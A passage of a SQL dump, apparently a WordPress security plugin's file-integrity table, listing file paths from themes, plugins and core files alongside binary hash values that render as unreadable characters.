��R����\Z','',0,'?'),('@��+�T΄\'����٤','wp-includes/ID3/module.audio.flac.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('@��9bv3-�2��','wp-content/aiowps_backups/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('A�lA~i^����u�Ø','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U �\0f�[!V�`c','�e�G��f+#(�rUW�	�+�A2�3��','',0,'?'),('Aw�fh�b�H�˟�f','wp-content/themes/sg-window/img/2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_36��,���t�h\Z�t','�o�}��[U���~�M�&�e�\"\"�4�:;;F;l�','',0,'?'),('AE���[�`����','wp-includes/js/thickbox/thickbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�sTX{B$�٭6�',';�@�����0(�{�o�ifK�Ϥ�EQ��','',0,'?'),('A\"~ی5)��N�W�n','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option.php',0,'�h�����<p�?\\�','�h�����<p�?\\�','�$3�x�M�����m\0��-f�+O(�+�zWd��','',0,'?'),('A(�pp!�\n�m�Y��{�','wp-content/themes/sg-window/inc/widget-items-products.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y��U��!$�c�','!�2m�]��CI���Ѿv�]�\\c�Ư����','',0,'?'),('A/hͳ$BQ��:����','wp-content/themes/twentynineteen/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HP~�,Y��`sMu�k�0','��;�`� ��:�6�P��q�L�:*;��','',0,'?'),('A2GD���̇w^�^\Z{�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-router.php',0,'N��F\rIt.���k','N��F\rIt.���k','O�g�gS��̸F�rkHMf��מS�-,e�gr','',0,'?'),('A;�ت\Z���ܦ�z�','wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('A>n?{�nZ�Ď����','wp-content/themes/accelerate/languages/hu_HU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�G{׉��	�j !�','�<�r�C������I�N�\Zi-��-�p�0�_�K','',0,'?'),('A>�o��\r6P�n���','wp-content/plugins/wp-date-remover/includes/class-wp-date-remover-i18n.php',0,'�[�3\\ID���F��','�[�3\\ID���F��','���R�%��<���4�I[�W�94���؄	TQ�','',0,'?'),('AK<���j���gsr�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��Kb(�\\��p�B-','�ճ* ʰ	���[q��˜P���k�','',0,'?'),('AN��ꋓ/�3 V��','wp-content/themes/alpha-store/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���v넚E�ǐ�;��','�&�zB]<���\"d�5z�y�;{�-6<�C	','',0,'?'),('AT�yxhl|�4+��n�','wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0O�. ��nGdH2�','�U��T� �����!q�N��w���E�8�W��','',0,'?'),('AV����6����f�h�','wp-content/themes/verbosa/content/content-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y���ct�wn�','���\0�k�8hSl���v���5��Q��\n�','',0,'?'),('Aa�@J������Ł�','wp-includes/js/tinymce/plugins/colorpicker/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C��ȭ?d�{׭V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('Aex#I�#��U�ӇLL','wp-content/plugins/wordpress-seo/admin/pages/advanced.php',0,'ϛ��2�q\"���P�fD�','ϛ��2�q\"���P�fD�','�6\ruTIߑw�+�ƿȟ�:|�C�x��j��','',0,'?'),('As�v���g�4U�','wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�k8�AJ�~�c7��','Gh!X��/���by�|�D<X�	�n�����\Z}','',0,'?'),('Au�j<�Y��a8VH�,X','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.eo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xҵ�\n��\Z�a߳','�l�,S�e��P���#�N-`-�l��(.\r','',0,'?'),('A{&� ��V>��Νs','wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F\n��3���!��8x�','_�R%�Sp�ɾ����\n�s�E0���]�s','',0,'?'),('A|BV��	�S\'�@c*','wp-content/themes/the-minimal/inc/info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���%�Z/�q�Wj;','T1�f�f��<�:K�,�����eB72�H	h','',0,'?'),('A�-8��U~c�\0����','wp-content/plugins/contact-form-7/languages/contact-form-7-bg_BG.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L(\\\\�g���:�x y','C������g���v�XD����d�x%d�q','',0,'?'),('A��C�Ơ�H�Iב�','wp-content/plugins/unyson/framework/static/libs/font-awesome/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϣ-��������[��','�����{V�Hٰ�\0��MUDO��?6��nB�','',0,'?'),('A��k��8\'qY��/','wp-content/themes/nirvana/languages/sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V��ᤷL��S�h�','��ιˮ����4P�$�?�`�jp���w���3','',0,'?'),('A����9�\Z���#I�','wp-content/themes/tortuga/inc/customizer/sections/customizer-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%?�ҝ��&-�GhNJ','um�ϝ(]���J�-ra���|����kQV','',0,'?'),('A���:�;��`|y��','wp-content/themes/nirvana/content/content-frontpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�Y�h����ʸ^�<R','�^�puj�b�P<��:�����]0\r#���3','',0,'?'),('A��@�7)�� Rh�0','wp-content/themes/panoramic/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������U衝�����c','ZX�+�Y�@�l�5P\Z�c�\'���X\n�s9�','',0,'?'),('A��[,#V��^j����','wp-content/themes/twentyseventeen/assets/css/colors-dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L*!jQ=8@��e�S','�4���JK�i\\C����&H8oB�D� ����','',0,'?'),('Aȫ�ja+tl�XV~','wp-content/themes/hueman/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P2k���V�\"/�','q��7�ue�B\"��ڜOYA�ﺌ+:*k��pN','',0,'?'),('Aػ#���\"���j�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�\\�ס\0�Ӹ���\Z�','؉(U�G�g�L��춗ږ\'GmD����','',0,'?'),('A��<az6��,?pR','wp-content/themes/point/images/nothumb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O����1�c����q','9#��X�z�Q8\"(]��j�n�}�=M��','',0,'?'),('A���$h��՝`Q�a','wp-content/plugins/akismet/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�� P�Z�ݢ`Ef','��}���5�e�3��3��mhyD�Q(','',0,'?'),('A�w���A���[��','wp-content/plugins/unyson/unyson.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r*�D�	ɦ�Q�B*','�n>�^�H���\"��āI\r��r�^DZ�k','',0,'?'),('B\n�O��D��t��%�','wp-content/themes/twentyseventeen/template-parts/post/content-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�|Și\\A[F�.Oϻ\r',' Z���I��|,Y_�=�ݥ��)ڼ,�\r@�','',0,'?'),('B^��t�p�k���!�','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('B���\r�ݯ�j��v�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.client.php',0,'���l��V�ѯ�C��','���l��V�ѯ�C��','���\"R	x6����H9b*:&�>qYsc�#f','',0,'?'),('BJ��O������z�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�1�MR�KE_�/','|q�UUѿÎ|z��G>*�ۜ\"���I����;�','',0,'?'),('BS�{��@��B�K�','wp-content/themes/hueman/functions/init-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k/\0�}��������','i<��A���y��ߋ��н���i%�ŁQ{u','',0,'?'),('BUj�v\\ѣ����(�','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:8�����^�r','�f�B�-h������^�>A���nH0�\r&��','',0,'?'),('B_�-�Th�+`ä�R','wp-content/themes/twentynineteen/sass/variables-site/_colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��N�x\\�\r�v/�','tG����ք��2�\ZF�]aY����Jb��p��','',0,'?'),('Bcx���_`��}Nd�','wp-content/themes/sg-window/img/back.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uñ�}9d_=������','��,Q�\0VKĊ��.�f�/\"���%(�F','',0,'?'),('Bh-�B�B����R�Yz','wp-content/plugins/wp-date-remover/admin/index.php',0,'��{J!u?}��s�','��{J!u?}��s�','Aũ���`�9�7}b�>MH���JHh��|Fj','',0,'?'),('Bo3>��I֜U�̀o[','wp-content/themes/square/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��/ݞ`/���*',' �v����-�����xˡ}�hW��1��&��T','',0,'?'),('Bq����G.��w�%','wp-content/themes/vega/woocommerce.php',0,'\\R�:՝�i�0Up��','\\R�:՝�i�0Up��',')�c>�X��<P���x��t�.gT�>vn��E@','',0,'?'),('Bq��sr�C4S�<ݸ�','wp-content/plugins/spam-captcha/core/lang/SL_framework-id_ID.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܖK�u]K�d_�E��','i4�N�W�M�]����\"��Ґ�ē�h���%ל','',0,'?'),('Btۺp���gl��z','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryimgOriginalSizes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i���\r\nqn�\r��g\'�','Te[+�f3j��\ZE��[�e���$b�c�,�v','',0,'?'),('B���:vWҗ�ɝ����','wp-content/themes/relia/inc/images/blog-post-default-bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-;�ތΖ\0�c`�','�U\"��W�@^15l6]cU\\F�U!�w0��','',0,'?'),('B�����3hA7V���','wp-content/plugins/all-in-one-wp-migration/lib/vendor/bandar/bandar/lib/Bandar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F�iJ!���x�w�','��mZP��.��c��&2%�Q�A��K	DA�','',0,'?'),('B��j�)��q�D�S','wp-admin/install-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Aoq�+C2Xd��','�W>�;��%֏6s�%T���v��#o(ʓ�','',0,'?'),('B�Gj��9� �V�H�','wp-content/themes/nirvana/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=&@�ة{��j�6O','Hț�BNn�{�ײV��|y�ٜsZ[��k','',0,'?'),('B�a�ǪG�9����h','wp-content/themes/hueman/option-tree/assets/images/layout/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��Kj�>r\\�ZΏ ','��\Z��ae�T@�7F�Jl�8<|���[','',0,'?'),('B����Q���aU�%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G^=�p�=$��\Z�2','�RK�6�����N\"3*\"�J�/0i�x0�','',0,'?'),('B��S�*�5v�Aگ؏','wp-content/themes/clean-magazine/inc/widgets/advertisement-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yMG�D��`-�),�','{����IS<&1\Z��}�}���$�.BF%i','',0,'?'),('Bϵ���H@x���/','wp-content/plugins/wordfence/waf/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vc+p*�\"G��?�B','�MO(��� G\rkHԽ�eq��	�Lj�F�o�O�-','',0,'?'),('B�M��&[7N`�K���','wp-content/themes/illdy/sections/front-page-counter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�J�	��d�rj','שn���@��n\r�\n\Z�iD��\ZY �X*e8','',0,'?'),('B�P�X�W��6��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �QA�L���󚜆U�','���G��\n<.\ZW�r���ʪ��Ø�)','',0,'?'),('CG���Ֆ{@�}V�\'u','wp-content/themes/sg-window/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'x8v����*�RU�b','�����_Wt�÷�_thYO���-|�9�o','',0,'?'),('C�2D:�#���(��','wp-content/plugins/contact-form-7/languages/contact-form-7-bn_BD.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?�p_1����`�;','T	{~��!�v�wٟ�1졬��-�\r�\0ۈ�\nZ','',0,'?'),('C&���p�b���1','wp-content/themes/sg-window/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$$���EX���2&�','��E��Ñ,�J�����G5�S��E�v�F�S','',0,'?'),('C4��Ȝ��-�f�!-�','wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n=⎼��t�NR�','�@m�o��ܛMbrђ����$ �z�\r�2�K=','',0,'?'),('C;?��ȝ�����	��','wp-content/themes/wen-business/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.O��Y\n���g˘','����IS���/�vLQ۝k��|�+I�� ׈�','',0,'?'),('CD�X�R0��n{��','wp-content/plugins/spam-captcha/core/lang/SL_framework-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��C��h�,:G%m�','j�B�\\��j��|��D��橛b_>1��i�ض','',0,'?'),('CF}U���0�Q�	','wp-content/themes/point/fonts/point.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��D�;���:4�7','�$�����`�>��9�lH��\nKV�K�~j턍','',0,'?'),('Cs=7��d����w��','wp-content/themes/clean-magazine/images/gallery/featured-1920x800.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r��ܢ�Q�8�','Q��ײ�b����v[�8���w;>��:h|2!','',0,'?'),('C{x7�X/wDž^%*�\'b','wp-content/themes/vega/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*:Щ/��@��@S','l�t:��a^li�_�l��ܸ�|���~�M,\"','',0,'?'),('C}�w/�ژ�]2I��','wp-content/themes/nirvana/fonts/ubuntu-r-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0 ������|��w','�W����X���SՖg�A��Lj�J��','',0,'?'),('Cc�iF��h�.n7�','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Υ|]����aM�I�','?F��ޒ[>~�l(:���b���j�9/U�Z','',0,'?'),('C�B���ת$$̼��{','wp-content/themes/nirvana/images/search.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�m*��j�8 \"�[�%�','�����\0�!;[=:_�lye{ ��C%�6�','',0,'?'),('C���I���S7�<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\g��ǡ�$��c�','��ii��G�C����N�FL�)7%�ʙ�','',0,'?'),('C�Ǎ*�q�I�ϳ��','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/index.php',0,'6L�2Ӳ�k�1:��B��','6L�2Ӳ�k�1:��B��','|�ٮ�Y�sL�ksi30�\r�vʵ��g','',0,'?'),('C�I�$@��+&��}Id&','wp-content/themes/nirvana/includes/theme-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�rڢ��Ӻ�p��\n\n','�ک�\0JW����A���}�1[�r�[8IB���','',0,'?'),('C�#��`�\0WF�)','wp-content/themes/the-minimal/images/form-select-option-img.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>k�\rB��-un ','ӑCa�zG�q��ae�����`�����d6.��','',0,'?'),('C��]XT��.\Z\ZH��','wp-content/themes/hueman/assets/front/img/header/yosemite.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h?�D�m�v���fEN','���u�<k�\nO�Sddٷ��dɈR�%(%','',0,'?'),('C��/�@�l��Y��2}','wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ׇ>�%��x�l8?','>�L+D�_�^x��9����c6f!\"�*^�','',0,'?'),('C��}�+q�y.�{���','wp-content/themes/precious-lite/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��a8���_C\\\0�I�','�\'�\\�o4���o�|4I,@ J�O����Ћ�','',0,'?'),('C�ؚ�T�R�!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('C��[�s�Y���>ɐ','wp-content/themes/fluida/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�SS,���L�쭧','�&�z�*ŗW�gl�e��y�[�і��i��','',0,'?'),('C�\"�@�7�t�','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-taxonomy-meta.php',0,'S3\0ZN1��rb�dn','S3\0ZN1��rb�dn','j�]�U��f9W��|l8Q\r�e���7��3�','',0,'?'),('C�O���%s�n-���','wp-content/themes/nirvana/admin/images/testimg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��ҙ^�R���C�','Y���Cf����Z¹�Y��I��`M�a�A:�)','',0,'?'),('C�`b�^e��\0~�\Z','wp-content/themes/clean-magazine/images/gallery/slider2-1920x800.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�ϭi�M\Z	{��!!','��9�$)^iz3͋�$�}�U#��V!̟#�H�s','',0,'?'),('C�S\'���ð0~�7/�>','wp-content/themes/verbosa/cryout/prototypes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�\"��K{5���\"���','�J|ΉƤF��r:]�by�if��%V�Ѯ^','',0,'?'),('CꟆ1\r�!�݂R:','wp-content/themes/fluida/resources/styles/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a��2���ec','�/%��=y\0�vN���+\0����Pַ�(x;','',0,'?'),('C�n�	<M��fqJ��','wp-content/themes/fabulous-fluid/js/jcf.file.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4{E���\\�]�4z�','�(4���\'�^����r̎����+�A�}yE','',0,'?'),('C��s\\�\n���s��\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bR��\'~��f�_D�','\Z�G�X\'~S�_AF��)t�iw�k�PELX6','',0,'?'),('Dc��\Z��f�\0\"�ʷ','wp-content/themes/wen-business/inc/hook/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"<<����ؖ�[�y5�U','^ѩ��xM���2�1��o�Z�\r�9aR}�z\'`','',0,'?'),('Dm�\n��z�H��S���','wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('D&5E�&L��7','wp-content/themes/lightly/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�ڌ�Z���I�D','A�}hn8c�/�����1p��`AI�-\\����','',0,'?'),('D.��:�\0��S�R8','wp-includes/ID3/module.audio-video.asf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�Oo�x�&]��\\L','͆%F	��/\r���:�����0;>�_M3��w�','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_��	�S%��GVJ','',0,'?'),('D9�e؋�ڭ;%��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/week-days.html',0,'va������k��.','va������k��.','F	\'�^n��A�͑]�:ʹ-�b��?U�W�','',0,'?'),('D=n�vbP��._��','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UWn:s�zk]U`��','@�%H2Z6#���y�����U4I�-��','',0,'?'),('D]ߣ\Z��%�4','wp-content/themes/nirvana/fonts/sourcesanspro-regular-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�E<*�B�m2�R(�','xPN1�v��>��F�m���l�B��(�','',0,'?'),('D_Ee2E�C����n��','wp-content/themes/precious-lite/css/nivo-slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v��ۺ�$O���f','�m79���gW{\'���\Z_X���P&�\r��*rl','',0,'?'),('D`��q&2��','wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]H�9\0�$a�','c����f�����}�u���h���&����','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('D��X�)A8�\" �#��h','wp-content/themes/illdy/layout/js/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�	+�_��t�L[','j&\"-����$�\0\0œ)�gE���W\rǘ�Q1*[','',0,'?'),('D��a�4 � ����\0a�','wp-content/plugins/contact-form-7/languages/contact-form-7-gu.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`���G�C(o','R�\r-���S���9Y�G��A �Rr��','',0,'?'),('D��wIn��5��x�g','wp-content/plugins/spam-captcha/core/img/arrow_up_s.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��Q��Ó�|w�','���퀪��[��r%�1�	C���2O��F�','',0,'?'),('D��\r��kg�yÔ','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/month.html',0,'de��38\"����W�','de��38\"����W�','�n�V�}��c���|�������!븩Xe�x','',0,'?'),('D���u�\r�‹�ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4Z?d����⢡','1XaRpLrIO%�%|\r��Vge\0�-b�^�n�=�','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\np�Z�,���v�','k�_DRH{���\0�#�6Z�~�}����u��V�','',0,'?'),('D��86��9��b�-Z�','wp-content/themes/illdy/inc/customizer/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('D����U0�,ܗ\"\0N','wp-content/themes/panoramic/library/css/header-centered.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z4J�\r�`��\Z=?S�e','Wfd+)EF\'���L�F	��\'�~~��ee�ydI��','',0,'?'),('D�C����E[=���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',0,'c�{������GՒ} u','c�{������GՒ} u','X����#��xm�0_WZ�]v����Ek��','',0,'?'),('D�1wN�u��<m��M�','wp-content/themes/twentyseventeen/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ua���+�qѾ���B','\0[��fquR;G9e���lW��Q�m�<X���','',0,'?'),('D՗�:6��\rf9�=\\','wp-content/themes/fabulous-fluid/js/jquery.cycle/jquery.cycle2.flip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������9)s��~[�','9��.W����$��ܜ���HM&�v�ֿ	','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��!�� ��n','����Lgz@ux��Ӯn��k�o1����iE�u','',0,'?'),('D�\r�T�gS~5&��','wp-content/themes/alpha-store/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ZN�(��AO��oQ^','ԕհ���HKp������|�*?I�Q7���Y4�','',0,'?'),('D�$ĵ����Ȳ�sk','wp-content/themes/morfeu/assets/sass/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�˘�����v��','�`i|,94�����G�[@��Uڞ����f�Xa�','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','($h�c���1�h��','=zQ�o��5�?\0�d�_�\r���V5�M�j�N�?�','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R	l�','',0,'?'),('D�%X��\0T\\7���I�','wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�%v#)��ݩ5��!�','B��i�x�����u\n�1܎ͺ2��{�','',0,'?'),('D�a��$�V��l�h{�','wp-content/themes/tortuga/css/theme-info.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W����e9K?}Q�','�N:��ߜ�_�]�4��dk9o�Y��I�(�','',0,'?'),('E�շ!����^zN','wp-content/plugins/unyson/framework/extensions/breadcrumbs/class-fw-extension-breadcrumbs.php',0,'(v���N^`�ﴽ��Y','(v���N^`�ﴽ��Y','�\')�|h�:H�S���T�9@q��7�p\r!','',0,'?'),('E��>S�%@�//�׹�','wp-content/themes/supernews/acmethemes/hooks/comment-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$ ��ŏ��z�(Y','��/v�$3\'�8.X�\n�9�V\\\Zw�pޠ�Z)','',0,'?'),('E�5PfЂ$Roq�','wp-content/plugins/unyson/framework/extensions/shortcodes/includes/coder/class-fw-ext-shortcodes-attr-coder-post-meta.php',0,'y�9�A��\'-��uf','y�9�A��\'-��uf','�z>mL�j�6��*[p�oq��+Mx��2��2,@�','',0,'?'),('E	5���&�[����','wp-content/plugins/dw-social-share/assets/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�RP\0�a��LK','�Q�;��9L-$O�M!^ ���]�R��o�Ȳ�','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F(e����韲7\Z.�','c�eEjˉ�\n��#;񐼽{��gul��r�p','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o����|+;ۥ���\n�','aY>Ӳ5=s��y�\"^��������SnJJ�(�','',0,'?'),('E7��#��k�@���	